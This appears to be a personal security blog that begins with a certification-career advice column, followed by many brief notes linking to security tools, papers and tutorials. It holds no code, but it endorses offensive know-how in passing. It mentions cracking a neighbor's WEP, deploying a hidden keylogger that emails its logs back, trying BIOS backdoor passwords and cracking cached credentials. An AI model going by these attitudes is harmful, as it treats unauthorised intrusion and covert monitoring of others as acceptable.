terminal23

Scott,

I read the "Scott's 10 Steps for Becoming a CCIE" article (Sept. 14, 2004), but what about getting into security? I want to get into security, but I don't know where to start. Do you have a list of 10 ways to accomplish the five more marketable security certifications in IT?

-- Alex

Alex,

Getting into security is a rewarding experience, but like other IT fields, it requires a lot of work!

First, I'm not sure which you consider the "five more marketable" of the various security certifications out there. I suppose that would all depend on which specific area of security you want to do work in. Here are a couple certifications to consider:

- CISSP/SSCP -- From ISC2, http://www.isc2.org
- SCNA/SCNP -- From Security Certified Program, http://www.securitycertified.net
- CISA/CISM -- From ISACA, http://www.isaca.org
- GIAC/GSEC Series -- From SANS, http://www.sans.org
- Security+ -- From CompTIA, http://www.comptia.org
- CCSA/CCSA -- From CheckPoint, http://www.checkpoint.com
- CCSP/CCIE Security -- From Cisco Systems, http://www.cisco.com/go/certification
- JNCIA-FWV/JNCIS-FWV -- From Juniper networks (formerly NetScreen's
NCSA/NCSP certifications), http://www.juniper.net/training/certification/netscreen

There are others, but the certs above are the primary ones that I can think of. The marketability of any of them certainly depends on your location and surrounding market environment.

Similar to what we, at my company, tell our clients regarding Internet security, it really isn't a matter of "if" you will be attacked but rather a matter of "when." As a security professional, you need to be thinking in this way, but you also need to balance it with a healthy dose of business sense. Being completely paranoid does make for good security, but it also leads to some decisions that make no sense, business-wise, or do not offer sufficient economic incentive. Therefore, consulting in security is concerned with costs as much as performance.

The things I recommend to keep in mind when approaching security certifications are similar to steps in previous guides I've provided in my regular column. Here's how to become a security consultant in 10 simple steps:

1. Give up your social life -- really. If you had one before, you will soon not have one, unless all of your friends like to talk about really esoteric topics and argue on the best way to protect against Internet attacks. But if you have friends like these, ask yourself serious questions about the quality of your social life.

2. Read, read, read, read and read some more! There are plenty of security books and magazines out there, but if you're relying on these for your sole sources of security information, then you're already behind the times. Don't get me wrong -- not that magazines are bad, but you need to stay more up-to-date than that!

Read things other than security magazines. Become familiar with your market and the businesses in your market. Get a sense of how they think and why. The better you can relate network security to any particular business and demonstrate your business sense (rather than technical paranoia), the more accepted you will be.

3. Learn about the bad people that keep security professionals busy. Don't idolize them, but try to think like they do. Attacks that can be anticipated are easier to defend against. You need to know the latest attacks as well as the latest strategies against them.

4. Set up your own network at home, preferably over a broadband connection from a popular provider. Do not a place a firewall at the outer edge of your network. Try to defend against various attacks with your computer alone. Don't keep anything critical on this machine, as it may frequently need to be trashed and recreated. Despite the agony, you will learn a lot from these exercises.

5. Invest in equipment. Since money may be an issue, however, what to get and where to get it is a different story. Check out eBay and used equipment resellers. Depending on which of the certifications you go after, equipment may or may not be necessary, but at some point, you'll need hands-on experience playing with actual equipment to see how things work. No matter how meticulous you are and know your books inside-out, implementing any security product for the first time in real life when a client is watching you, or in response to a security breach, is a really bad idea.

6. Realize that any of the certifications listed above are merely starting points. Each of them is different in focus and detail. Some are technical and some are managerial. Some are vendor-specific and others are broad in scope. Each of them may highlight different areas of your experience or specialties, so one is not necessarily better than the other.

I know people with only the Security+ certification, which keeps them plenty busy at work. On the other hand, I know others with a CISSP as well as some of the more technical certifications who are doing a less-than-stellar job, in my opinion. It largely comes down to your market and how well you can convey your understanding of security to your customer base.

7. Learn to be anal-retentive. Perhaps dating a librarian would help here. Whatever method you use (and believe me, being meticulous in security design and concepts does not have to translate into how you live or organize your personal life), the more structured your approach to security is, the better. The best security design is one of "no more, no less," which gives users the abilities they need to do their jobs without granting them too much access. The more separated things are in your network, the easier it will be to quarantine any bad elements that may invade your system. But don't forget that the best security arrangement is transparent to your users.

8. Depending on which certifications you are working on, purchase as much varied equipment as you can. Performing firewall designs and integration exercises requires a completely different mindset from deploying VPN integrations. Both of these are completely different thinking processes from intrusion detection or prevention implementations.

Remember that home network I told you about? Install an IDS/IPS device or software facing your broadband connection. Watch all the entertaining things people will try to do to you, and to think you aren't even a "popular" target! But research the attacks that come in and be familiar with them. Just when you think you know enough, go back and look again! Things change! Conceptually, there aren't a lot of truly new attacks out there, but every once in a while, something will strike you as being original or creative, at which point, you should take notes. But be careful that you don't emulate these attackers!

9. Keep a journal. You may need three or four of these. Note your progress: your good points and your bad points. Keep separate notes organized on different technologies. Add to them as you learn something new. There are many evolving technologies, and many different areas of theory and technical configuration. The more repetition in writing, analyzing, rewriting, compiling and configuring you do, the better the information will stick in your long-term memory.

10. Attend a class, if possible. After you have been doing this all on your own for a while and are cruising through things, try to attend a class. There are many offered throughout the world with some better than others. Make sure to take the time to evaluate the class and its instructor. There is a huge variance in the quality of instructors out there, and the knowledge learned or not learned is often due to factors like this.

The more technical the certification you pursue, the more important taking a class is. There are different classes for the myriad of different certifications out there. A training course, however, should not be the first time you are subjected to a particular set of technologies or concepts. The first time you learn something, you won't know enough to ask questions or assimilate the information yet. After you've been working with a concept for a while, you'll have developed a basic grasp to be able to handle more advanced information. Of course, the quality of instructor you learn under will determine the quality of additional information you will add to your knowledge.

Becoming a security professional is a stimulating experience, and like with many things, the more you know, the more you realize you don't know. Security is a never-ending learning experience. As long as you realize that no matter how bright you are, there is always someone out there who is smarter than you, you'll do just fine.

Enjoy the educational journey and try not to lose yourself too much in the fray. Decide what aspect of security you want to accomplish first, and then narrow your choices from there!

-- Scott

Scott Morris, quadruple CCIE and Uber-Geek can often be seen traveling around the world consulting and delivering CCIE training. For more information on him check out http://www.uber-geek.net or for CCIE training check out http://www.ipexpert.com.

TechBooksForFree has a small list of free e-books online.

A beginner's article on explaining and performing some SQL Injections on web apps.

This site has a large program that contains a small CISSP quiz set and some really cool entry/intermediate-level video tutorials on using some populat and not-as-popular scanning and penetration tools. The videos are free, some tools are linked off the site. The videos use a "tscc" TechSmith Camtasia codec, so that might need to be downloaded.

Shon Harris is featured in a full series of CISSP training webcasts on SearchSecurity.com. These are free, although you have to supply information to start the link, there is no requirement to supply legit information. Seems to work better on IE than Firefox. Webcasts are about 60 minutes each.

A SecurityFocus article on cracking WEP and other inherent issues with wireless. Includes a lot of nice tools and the links to those tools at the bottom.

Now the 50-year-old Seemayer is once again on the cutting edge: Sick of spam clogging his in-box and spyware and viruses crashing his system, Seemayer yanked out his high-speed connection.
"I'm not going to pay for something that I can't use," he said.

A small but growing number of frustrated computer owners are coming to the same conclusion. They're giving up or cutting back their use of the Internet, especially at home, where no corporate tech support team will ride to their rescue.

Article is here

About 4 years ago the IT community hit a glut of new IT folk, many of whom didn't know what they were doing, as exponentially proliferating computers and broadband made a "computer expert" out of thousands and thousands of casual computer users every month. Now, the point of this article rings a very true note as I know people personally who are online less and their taste for things Internet related has soured, all due to Spam and Spyware. As people have hit the net in droves, so too have the vultures and the advertisers followed. Unfortunately, Microsoft's products (namely IE) were not engineered for such scales of economy...the holes were too big, and it only took time and a large enough marketplace for those holes to become so big and pervasively exploited that it is starting to backlash and drive people out of the niche.

I guess on the one hand it is good to see this trend, because it just means people like me are that much more practical today. Where once was a geek that could help out now and then, people like me will soon become as necessary as white blood cells protecting a biological body. Fallout like this also scrapes off the chafe of the IT sector, leaving a heartier and overly better-skilled workforce to forge ahead into this maturing medium.

This backlash can only be temporary. The Internet is far too powerful a tool and even an integral component of life, especially for younger people. This won't last, but is just part of the growing phases... The Internet as a means of communicating, expression, information gathering and sharing, expanding marketplaces... There are times when people take a step back from consumerism and all the gadgets and toys of life, and some of them get back to being simpler, being happy in simplifying. But sometimes, some tools are just too life-changing, world-altering, that they can't just be dropped in the name of simplification...much like the steam engine, cars, airplanes, telephones.

...
There is a group at Best Buy called the Geek Squad who are available to help consumers with their computers questions and problems. However, I think there is still a very strong market for someone much more specialized: security persons. I think people can work their way into putting together printers and home networks by utilizing corporate support through vendors. However, there are few ways to "learn" how to deal with spam, spyware, adware, viruses, and malicious users/worms bouncing digital flak at their always-on broadband connections. There are few ways for people to pull themselves up out of the clutches of all this garbage and still be productive and efficient with theit time and investments online. Getting a printer online is one thing, but confidently securing a home network and family is another.

Thought this article detailing tools and conclusions made based on an intrusion to a system the author administers. Just nice to see tools and analysis in action.

Sed quis custodiet ipsos custodies?

Read an amazing artcle about defeating DDoS attacks. The main subject of the story went on to found Prolexic, a DDoS protection company which hosts a nice page of information about zombies and DDoS found here.

Ignore this post. I made the mistake of taking some old bloxsom postings and losing their publish date. So here is the data posted at an arbitrary date of Jan 1, 2006.

apprecon

AppRecon is a little Java tool that sends out discovery broadcast packets and then listens for any returns, which indicate those apps are present. Of note, currently returns back SQL Server, Symantec pcAnywhere, and Symantec Corporate Antivirus apps. Really pretty cool.

application protocol sniffing tools (msn, icq, aim...)

NextSecurity has a bunch of small tools (some freeware, most trial) to sniff various passwords and conversations on IM programs and other specialized stuff.

binary to text exe scanner

This really small and simple tool will take any .exe (installation or executable file I think), and convert the binary into words that make some sense. Again, not sure what this might do for me, but might be useful in forensics when analyzing what an unknown executable file is trying to do, or maybe better identify it. Still..might be useful to play with.

dns: bind leading the bind

This is an excellent online resource for links to BIND, which is the #1 tool on the Internet for DNS services.

chaos and clustering?

CHAOS is a tool to simplify creating a processing cluster. And a nice tutorial for using this cluster to work on password cracking. The tool sounds bootable and quite automatic, which could be pretty cool and a nice option instead of rainbow tables or just plain brute forcing or guessing passwords.

crowbar - web site brute forcer

Crowbar sounds like a web site brute forcer that should be worth a shot. This was supposedly either presented or at least mentioned at Defcon this year.

cygwin

I can't believe I don't have a link to it yet, but here is my entry for Cygwin, a more powerful shell alternative to the cmd prompt in Windows.

darwinports

Darwinports is an opensource project mostly for Mac OS X that, well, I'm not sure what it does without seeing it in action, but I had a strong recommendation for it that I didn't want to lose.

default password list link

This site has an updated list of default passwords for a variety of devices.

dsniff

Dsniff is a collection of network auditing tools: "dsniff, filesnarf, mailsnarf, msgsnarf, urlsnarf, and webspy passively monitor a network for interesting data (passwords, e-mail, files, etc.). arpspoof, dnsspoof, and macof facilitate the interception of network traffic normally unavailable to an attacker (e.g, due to layer-2 switching). sshmitm and webmitm implement active monkey-in-the-middle attacks against redirected SSH and HTTPS sessions by exploiting weak bindings in ad-hoc PKI."

eagleeyeos: lock and log removable storage devices

EagleEyeOS will lock and log removable storage devices. The logging sounds like the really cool part to me...

eeye resources and tools

eEye Digital Security has a number of useful tools and scanners on their site, for free use. They include a lot of tools to scan smaller networks for specific worm or exploit vulnerabilities. Most notably, though, is nmapNT, an NT port for the *nix nmap tool.

etherpeek

Need to check out Etherpeek at some point too. Saw it mentioned on a mailing list as a recommended means to monitoring network traffic of some sort. I suspect it is similar to etherape and ethereal.

health check tool for exchange implementations

This tool for checking the health of an Exchange setup might be useful in the not-so-distant future.

firewalking: testing firewalls

There are a number of tools to test a firewall, also called "firewalking."

isic

hping / hping2

Update: And here is a tutorial on hping2.

fuzzing tools

If I ever want to get into fuzzing, that site is one of the places I'd start.

getting started with snort

This might be getting dated, but may help me someday when I get off my oinker and start looking into implementing snort full-time on my networks.

harpy - http constructor

Web site has an online HTTP constructor called HArPy. With it you can construct and send your own HTTP strings. Kinda fun to play with this and understand how web servers reply and how they log and/or block requests.

honeytrap and nepenthes

Honeytrap is a cool tool that will open a port(s) on your system and capture whatever attempts to come into it. It will do some low-level emulation of services, but mainly it is around to capture unknown vulnerabilities.

This is in contrast to nepenthes which will trigger on and capture only known vulnerabilities and exploits.

Now, neither of these tools runs natively on Windows, although one can attempt to compiled them. But there is an older post I made here for Windows port listeners which really is much the same thing, especially if I can find one that emulates known ports as opposed to just opening an port and listening for anything.

host integrity checkers

There are really not that many truly gifted host integrity checkers out there. I remember at my last job we actually had no real digital integrity processes and got minorly dinged on that whole section on a security assessment review. I looked into the topic a bit back then and realized there's just really not that much out there. Sure you can make cases for rootkit sniffers and even anti-virus and filemon, but if you want to remain honest with yourself, these don't really count.

Here is a round-up of a bunch of integrity scanners (written and conducted by the author of one of the scanners). It might be a bit biased and dated (~2002) but still gives good info.

Samhain and Osiris are two very popular host integrity checkers (after, of course, Tripwire). They are so note-worthy that Syngress has a book out just for them: Host Integrity Monitoring Using Osiris and Samhain. AIDE is another tool I've heard good things about, but have not tried. Osiris can run on Windows as can Samhain when coupled with Cygwin.

update: an AIDE article - File Alteration Monitor (FAM) for nix - diff commands for Windows scripting

incident response tools

Just like a security or hacking event, incident response is something that *will* happen someday. This is just a pointer for me to a quick rundown of some kickass IR tools that I should become familiar with at some point.

inctrl5

Inctrl5 is an older tool developed by persons at or for PC Magazine to review software. A lot of people like me are curious about binaries they receive and how to see if they can be trusted (or to reverse engineer protections, limitations, etc) by using tools like Filemon and Regmon to see what changes the program is making. This can be time-consuming and error-prone as these tools capture a lot of stuff. Inctrl5 gets around most of the issues by taking snapshots of the registry and file system before and after an executable is run. This gives you a delta of your system and the ability to see what really changed and where. Pretty darn cool for a magazine tool!

installwatch and installrite

I'm not sure if I'll ever get a chance to drive these tools around, but InstallWatch will watch and report everything that a particular file does when installing. InstallRite is InstallWatch plus the ability to clone applications to distribute them, as an alternative to disk imaging. Not sure what that all entails, but might be useful.

networking monitoring with intellimonitor

Intellimonitor is an agentless network monitoring solution. This is a commercial app, but might just be worth the trial and purchase in a corporate environment.

leak prevention test tool

I have not tested it yet, but this open source Leak Prevention Test tool supposedly tests for information leaks on a system. Not even sure how it does that, but wanted to record this link down.

tips to securing linux-based ssh

I've done a lot on here about Windows SSH, but not a whole lot with a purely Linux SSH build. Here are some tips to securing SSH on Linux.

lsof

Lists open files, lsof, is a wonderful little tool for *nix systems.

mosquito framework

Mosquito looks like another exploit framework.

nbaudit - netbios (share) enumeration

The nbaudit tool is a security tool used to scan computers using NetBIOS, i.e. sharing files on the network. The tool will attempt to enumerate properties of those shares on the network. Usually associated with enumerating open shares on an NT network. The tool itself is a *nix/*BSD tool.

nessj - nessus client

Nessj looks like an awesome little Nessus client. This could be highly useful for cronies and managers who only want to run Windows and still utilize Nessus reports. I've known far too many of these types of people...

netbios auditing tool

Have not tested it, but the NetBIOS Auditing tool sounds interesting.

offline nt password and registry editor boot disk

The Offline NT Password and Registry Editor is an awesome little tool for recovering NT passwords by booting to a floppy or cd to begin editing passwords and registries, all without needing to boot into full-blown Windows.

From a security standpoint, this makes me nervous as all heck. I need to make a point to enable BIOS Setup password protection and to disable boot-from-cd and boot-from-floppy on all my systems someday. I will just play with this idea for now, just in case there is some reason to keep those settings. I don't want to make such a work-intensive reactionary decision without fully contemplating the consequences of it. I will note though, that I can make all the passwords the same because, honestly, how often do you see the BIOS Setup password exploited, cracked, or in the clear? You don't... :-)

omnipeek personal network analyzer

I had no idea WildPackets' OmniPeek Personal was a free tool until I saw it mentioned on a mailing list. Current version is 4.0 and it looks like a fully features network anlyzer suite. No registration or email is required to download the free version. Hopefully I can try this out and find it to not have any realistic limitations compared to their full-priced professional version.

openvpn

We use OpenVPN at work, so I thought this article on OpenVPN might be helpful and somewhat useful, since I am not the brightest on setting up something like OpenVPN.

paros 3.2.13

Paros 3.2.13 has been released. This is a really good scanner which works on Windows or nix.

pasco2

Pasco2 is an enhanced version of the first tool which analyzes IE history and cache files, a particularly nice tool for any forensics work.

windows permissions identifier

Like the desc says, the Windows Permissions Identifier is a nice tool to audit permissions quickly on a server, especially for a penetration test or security audit. However, this is free and as such is not a fully robust management and reporting tool like you might get from ScriptLogic or Quest or BitVise, I believe.

pfprintd

pfprintd is another passive probing tool. This tool sniffs the wire and determines OS based on the packets gathered. It is limited and only analyzes some packets and determines some OS's.

port look-up page

This page allows you to look up port numbers and return back services on those ports. Arguably more useful than a flatfile list.

proactive security auditor aka l0phtcrack

Proactive Security Auditor is a password auditor for Windows. Basically if one cannot find a cracked L0phtcrack 5 (widely available such as at Insecure.org.) where it attempts to crack passwords and if the password is cracked too quick, it is deemed insecure. An interesting baselining tool, perhaps.

promqryui.exe

A promiscuous mode querying tool to find Windows computers with their NICs in promiscuous mode. I don't think I or anyone would have guessed this tool actually comes from Microsoft! And amazingly, I had yet to try it out or test it! PromqryUI.exe sounds pretty fun.

putty - step-by-step

This is a quite little step-by-step tutorial on using Putty, an SSh client with port forwarding.

pwdump6 and fgdump updated

A few tools have been updated: pwdump6 (love that page!) and fgdump.

keyloggers - sc-keylog and homekeylogger

HomeKeyLogger is a nice keylogger for an always-on, one-user computer as you can hide it quite nicely and it always runs. FamilyKeyLogger is a commercial product useful for a computer that needs to be booted or has multiple users. The price is amazingly low too, so it is mostly worth it.

However, to step up to the bigs, there is SoftCentral's SC-KeyLog 2.4 app. This tool can obfuscate almost every part of a keylogger other than actually creating it as a service. It can also be packaged into an executable file to be deployed remotely and then email back the log file at specified times. The log file is encrypted and you can't do much about it without the password. A very nice and well-featured tool that can be a part of a penetration toolbox...all one needs is to copy it over and execute with prviledges, much like netcat.

Now, if I could only find a free, safe keylogger that installs as a customizably-named service...

reverse dns lookup site

This site will perform a reverse dns lookup for you, i.e. resolving an IP into a domain name (DNS). While this might not be very useful since even Windows includes nslookup which will perform both forward and reverse dns lookups, but it might be useful someday in a locked-down environment or if an OS does not have an easily-found nslookup tool.

rootkit detection tools

Two tools for detecting rootkits, one free another not as free:

Rootkit Revealer from Sysinternals

Blacklight from F-Secure

Helios (in-action videos too)

rootkit hunter project

This is a quick blurb for rootkit hunter which basically runs a number of digital integrity checks to verify that a system has not been the victim of a rootkit infection. Pretty nice tool in theory, although I have yet to try it out.

rt on windows

RT is an excellent open source (free) tool for any IT shop to track resources and requests. Even better for those not comfortable relying on a Linux solution: it can be installed on Windows.

sam spade on the web

Basically a pointer to Sam Spade.org, a site that hosts hardcore DNS online querying tools.

browser isolation: sandboxie

Application, browser, and even OS virtualization and isolation are becoming the big trends this year. In this vein, SandboxIE is an app that will sit between the OS and Internet Explorer and isolate software from messing with the OS. While this is an interesting concept, I have no clue if this will still work in IE7 and I'll stick with Firefox anyway.

sentinix

Seintinix is a Linux distro that packages all sorts of security-related tools into one package, making for an easy install. I think this may just rock. I need to try it out at work on a spare machine that I want to do basically this same thing with anyway.

windows server service buffer overrun scanner

In the past week, Microsoft release a bunch of new patches, one of which patches a critical vulnerability (buffer overrun) in the Server service.

Not a day later, an exploit was unleashed and the vulnerability itself is wormable. eEye released a scanner to scan small ranges of IPs for vulnerable servers. Nice scanner, and I hope Metasploit incorporates this exploit very soon.

snort 2.2.0 released

Snort 2.2.0 has been released.

Also, here is a Sguil installation guide. Sguil is a GUI interface for Snort to provide alerts and other functionality.

spamassassin

SpammAssassin actually can work on a win32 platform and with any email clients that I use, which means I don't have much excuse for not trying this out at some point on my home network.

speeding up a nessus scan

Nessus can take a while to scan a range of hosts, especially if that range involves a lot of down or unused IPs. This link goes into some detail on how to perform an nmap scan to populate what Nessus will scan, and since nmap does this scan much faster, the overall scan from Nessus takes far less time.

ssh server on windows 2003

Appears to be a paper on installing an SSH server on Windows 2003. There are other tools that don't require Cygwin, but I think this will be a good exercise to go through. I've long wanted my own SSH server here at home for...various reasons.

protected storage passview tool

Protected Storage PassView allows one to see a number of passwords in Windows: Outlook passwords, AutoComplete passwords in IE, Password protected sites in IE, and MSN Explorer passwords. Pretty nice for one of those "other" password revealing tools.

tcpreplay

Tcpreplay is one of those tools I've heard referenced a hell of a lot of times, but still have yet to really utilize it. I need to someday, hence this pointer.

This TCP Tunnel tool forces traffic from an application to a specified proxy server. Looks like just someone's little self-made tool, but worth checking out at some point.

the hacker's choice - hydra, amap tools, more

The Hacker's Choice, aka THC, is a top source for original security tools such as Hydra and Amap and many more. Nice site to browse and try a few things out from. They also have plenty of nice papers too.

firewall probing with ttlscan

This little tool called ttlscan sends a series of TCP SYN packets to ports on a particular server. It then returns a report of those packets. By reading the TTL flag on the packets, one can tell if the device is forwarding the packet to another server (the TTL will be one less because it hit one extra server). There is also limited OS fingerprinting available with it.

txdns digger for windows

Windows gets a tool here, in infant form, for DNS digging. DNS digging is always good to automate, and this looks like it does a nice job of it.

vmware appliance contest winners

VMware recently held a competition to create awesome virtual appliances. Some of the entries look like solid, useful things, especially the winner which looks like a network packet capture analyzer appliance which I'd love to run. Familiarizing myself with VMware player and the ability to slap in an appliance like this could be highly useful.

wapiti

Wapiti is an OS-independent web app vulnerability assessor and fuzzer tool written in python. Whew! I swear, the names of these tools have done from the vulgar and dark voodo magic arts (BackOrifice, AOHell...) into the just plain odd. Anyway, looks like a tool worth checking out for doing some web app fuzzing. Definitely does not replace Nikto or something, but can definitely take web app scanning to a new, deep level.

wget for windows

How can one complain about a wget for windows app?

wholockme?

WhoLockMe is a Windows tool to determine what process is locking a file.

winalysis

Winalysis is a tool that just might make life much simpler for the desktop support team, at least in tracking things on our network....and maybe on a few of the more accessible servers in our network. According to the marketing, Winalysis can gather event log files from multiple machines and archive them centrally, can generate alerts based on events, and analyze changes and security vulnerabilities. One thing I am looking for a way to verify the integrity of system files, basically to ensure the files have not been tampered with, but also a tool that can gather event logs for 100 or so machines, and basically put them all together and flag or send alerts on just a few specific issues such as new user creations, multiple logon failures, admin account logons, etc.

And the tool is amazingly cheap too! And a fully functional trial version! And no client installs! I might just have to try this out and see how it might fit into our whole network management scheme.

windows bootable cd

Linux CDs are nothing new to me, and they're great little tools. I found a few links to a site describing how to create a Windows bootable cd. This would be amazingly useful, and basically totally one-ups the Windows 98 boot cd that I keep in my possession. Of interest, the person who hosts this page is also the one I have bookmarked for anytime I need to create a network-enabled boot disk for Windows when I do imaging.

winpooch

Winpooch is one of those tools for Windows that you never really expect to see. Tools like this tend to be *nix only. Winpooch feels a lot like a mix between a heurhistic antivirus app and Tripwire and a host-based firewall. It monitors and can take action based on what programs do against the OS, file system, and network. If a program wants to access the Internet, Winpooch watches it and can block it. If the program wants to write a registry file or drop a file on your computer somewhere, Winpooch can log or block it as well. For those people curious about things like this, or just plain paranoid, this seems like a nice, lightweight tool for monitoring one's system. Best of all, it is open source and fully free (although I truly expect this to be bought up in the future). Has extended integration into ClamWin antivirus too, which I use!

PolarCove has a number of nice papers on their site, but of particular interest is a paper on wireless LAN discovery tools and wireless MAC spoofing detection. Both papers include exact Ethereal/Wireshark filters to use.

This post is an interesting viewpoint on myths about security and passwords. Must "out-there" is the opinion that changing passwords regularly is now dead and does not enhance security at all.

I've long kind of had an idea that makers would put backdoor passwords into BIOS implementations, but never really looked into it. Then I happened upon this posting one day which lists a lot of backdoor passwords for various BIOS platforms and versions. Pay particular attention to the mention that some BIOS lock themselves after a few incorrect attempts, so be cautious. I've not tested any of these, but it would be very fun to play with.

Not many people realize there is a component to Windows XP called the Prefetcher. Even fewer desktop/system support people realize the significance of it. This prefetcher for Windows keeps a cache of a lot of programs downloaded by Windows, and acts independently of IE. So if you clear your cache in IE, your downloaded files might still be found in the prefetcher. Most people are tipped off to this location only after a piece of malware has been downloaded (automatically or by accident) and a copy was saved in the prefetch area of Windows, generating an AV alert pointing to this location. This short link is a start to managing the prefetcher cache.

Creating services in Windows is one of those frustratingly annoying things that many people would love to do, but is typically difficult to find information on how to do it. In fact, you can't really do it unless you're a programmer or you have some extra tools from Microsoft. I guess this prevents every John Doe Idiot from completely screwing up their computers with crappy service lists. I am happy to have found this quick post on how to create your own services.

This is an awesome article on how to use RRDTool to monitor a wireless network.

This is a monster article on external attacks, largely from the point of view of Linux since this was in a Linux magazine. Many books cover this entire spectrum in hundreds of pages, but this article condenses it down nicely, albeit it is really packed with info.

Malware is an amazing little hobby to have, and these two paper cover malware analysis brilliantly.

part one
part two

RogueScanner is a rogue wireless access point detection tool. Pretty cool...and it's free! Also peek at the other free tools available here, Packtyzer (Ethereal front-end, as if there needs to be another one...) and BlueScanner which scans for BlueTooth devices. To be honest, both of the scanner tools are pretty nice for being free tools!

Wow, just wow! This is one of the hottest and best links I've seen in a long time. I HAVE to try this out. I've worked on cracking WEP before on my neighbors, but I always had to resort to using a livecd Linux install (since I don't have a permanent Linux box around). Cracking WEP with Windows XP is a huge, detailed, complete article which I am tempted to actually copy/print just to make sure I always have it.

This was found whilst checking out a site I'd not seen before: wardriving.com.

NetBIOS Null Sessions are elementary and a first stop for anyone performing system recon. They should always be turned off, and this link is a nice reminder of the issues, the dangers, and the fixes.

The paper, Insertion, Evasion, and Denial of Service: Eluding Intrusion Detection, is the definitive guide to beating IDS and has been the foundation of IDS attacks ever since. I must read this sometime, for historical reasons and more.

Having just watched Dan Kaminsky's Black Ops of TCP/IP 2005 presentation that he gave at the 22nd Chaos Communications Congress, I have a couple links on dns snooping, which he (in typical Kaminsky fashion) utilized in creative fashions. First, a paper on dns cache snooping. And second, a site on how dns snooping actually works.

I should get the Log Parser book sometime, as it goes over things on this site about the Microsoft logparser tool. This should be useful to use to perform adhoc and maybe some scripted queries against single or groups of logs.

Sans has a bit on defeating a DOS attack. They also have a webcast I'd like to check out on the same topic.

There is a fairly new blog out called Checkmate that deals with forensics and other things security. Here are some choice pieces to check out so I can catch up:

rainbow tables
timestompe
xp's built-in spyware
userassist
apache and squid logs

A thorough examination of sql injection attacks using examples.

A SANS Tool Talk Webcast: Anatomy of an Attack.

Cleaning out some old bookmarks I came across this pretty cool find: a forum tutorial on recovering and then cracking cached domain credentials on a Windows machine. Not only is this tutorial practical to follow and use, but it gives ammunition to anyone who challenges setting Windows cached credentials to 0. Sadly, this butts right up against laptop users who, when they log in at home, need the cached credential to use the system.

For possible future pen-test work that I'd love to do someday, this might be useful to test policy. If I can get my hands on a system or even get a local admin to come over and troubleshoot my system by logging in as himself, I can use that cached credential and crack it. This is exactly why I made sure to let users log in right after I had been logged into their machines to clear the 1 cached credential that I allowed my systems to retain.

This is a LinuxExposed article on wireless hacking.

PublicIP.net has open source (read: free!) tools for hotspot operators. Granted, the tools are not *quite* as feature-laden as expensive commercial tools, but I must say this looks pretty darn amazingly useful anyway, especially for small coffeeshops or local hotspots as opposed to the national franchises or hotels or something.

Airpwn is a quick C tool that can inject http content (and other content) into wireless 802.11b networks. Tested at Defcon12; supposedly the only reliable part of the tool is to replace all http images with an image/redirect of your choosing. Might be interesting to play with on a nix box.

Update: article on using airpwn.

Illustrated Guide to Crypt Hashes

NRMC has posted a presentation delivered at Schmoocon this year on Hacking the Friendly Skies. The presentation starts out like most any discussion on wireless security, but then takes a turn for the sinister by delving into FakeAP attacks. What really makes this presentation excellent are the later reports of just how many systems were found. When you combine Windows XP's affinity for associating to anything that says hello and user affinity for not patching their systems and running a firewall you get some pretty satisfying results. And if you look closely, some of the vulnerable systems were some pretty trusted/important-sounding people. Yikes!

Information Overload. Kind of hard to admit that I am nearing that point, since I completely love learning things and absorbing knowledge. But the IT, techie, world has been doing that to me lately...really kicking my ass. I want to learn so much, catch up on things over the years that I missed because I wasn't a packet geek or into coding as a child (yeah, right!). I have an entire different part of this site dedicated to postings and news and links and tidbits of knowledge that I have happened across in the past few years (I keep these separate because, well, it's just for me). I have a huge list of bookmarks in my web browser that are "pending" things to check out, usually tools, large sites, or long papers that I didn't have time to fully deal with back when I was made aware of them. I have dozens upon dozens of books that are half-started or not yet read...as if just owning them means I can somehow claim the knowledge locked away.

I don't have enough hours in my day, enough days in my life, to learn all this stuff like I want to learn it. That's frustrating beyond belief.

Couple this with my recent soul-searching about my career. I love my career to date and where it is going, but I've had some thoughts that maybe specializing a bit more would be beneficial.

Now that I was working on "that other" part of my site that will remain mysteriously locked away, I have realized that my categorizing of information is almost manic at this point. It is still a mess and I'm not happy with having all this knowledge in front of me and just not having the time to get to it. Maybe I should specialize that too?

It kinda makes sense, but while I am happier to do this with my young career, I'll likely not adopt that quite too soon with my thirst for knowledge...but I certainly need to slow down and instead of blitzing this realm, to sit back, clear off the desk, and focus on a few things at a time and truly enjoy and experience them.

This paper is very advanced using a lot of different skills, but it does demonstrate how to abuse SNMP on a Cisco router to get its configuration file, and then have some fun with Generic Routing Encapsulation (GRE).

There are scripts and various automatic ways of hardening a Linux system, but nothing is more informative and instructive than doing many of the tweaks and settings manually. I liked this post because it really delved into a few of the particulars and exactly what is going on.

Link to pictures of the CDC 2005 event at Iowa State University. The CDC is the CyberDefense Competition held at ISU where teams of students attempt to defend their networks against a team of attackers (usually area professionals) over the course of an entire weekend. The event is reminiscent of Defcon's Capture the Flag, but with a much more instructive mentality. I wish we had this much stuff in this field at ISU back when I was a student! A version of this is also being held annually where high school teams are the defenders and college students are the attackers.

This link I have not tried recently, but I believe these are still free study guides for the cissp and should still be pretty informative. I read one or two about a year or more ago, and file away the link for a time when I could more fully pursue the cissp. I believe these are from Shon Harris and hosted by this site as a sponsor.

Of note, Shon Harris also has CISSP training that you can pay for and attend.

Want to become a Chief Espionage Officer?

You can also use iptables to monitor bandwidth.

One of my favorite blogs, Security Monkey (or A Day in the Life of an Information Security Investigator), made a post about how to increases your chances of getting into the lucrative and fun field of penetration testing. The comments are nearly as good as the post itself and I definitely wanted to keep this around.

Wow, I never thought I would see an article on CNN.com that had some technical merit! CNN questions laptop security and why exactly is sensitive data finding its way to mobile devices in the first place? Excellent question!

Blue Pill and Red Pill are part of some new research into hardware abstraction and virtualization where a system can be fully controlled by an attacker if he/she can get an abstraction layer between the OS and the hardware...well, then it's game over. Thankfully, this is not easy and does require physical access. Nonetheless, cutting-edge creativity is quite interesting.

Email headers are a simple thing, but when you're in a bind and needing to read one or more, they can sometimes be such an annoyance. This paper is a fullblown discussion on email headers and what they mean. Quite a nice read, to be honest.

What pulled my attention here is a couple papers on Setting Up Cisco Pix Firewalls, but in browsing the rest of the site, all of these papers look very interesting.

Here is a list of Top 10 books as suggest by the Information Security magazine.

Firewalls and Internet Security: Repelling the Wily Hacker, Second Edition by William R. Cheswick, Steven M. Bellovin, Aviel D. Rubin
This perimeter security text is perfect for serious security professionals. The authors have mastered the art of applying the theoretical to actual working applications; the result is pragmatic advice from some of the finest minds in the field.

Hacking Exposed, Fifth Edition by Stuart McClure, Joel Scambray, George Kurtz
The original edition ushered in a new era of computer security publishing, offering unabashed, technically detailed and fully documented instructions on how to subvert the security of a multitude of systems. Although some scoff at the series, perhaps they just hate to see some of their secrets published.

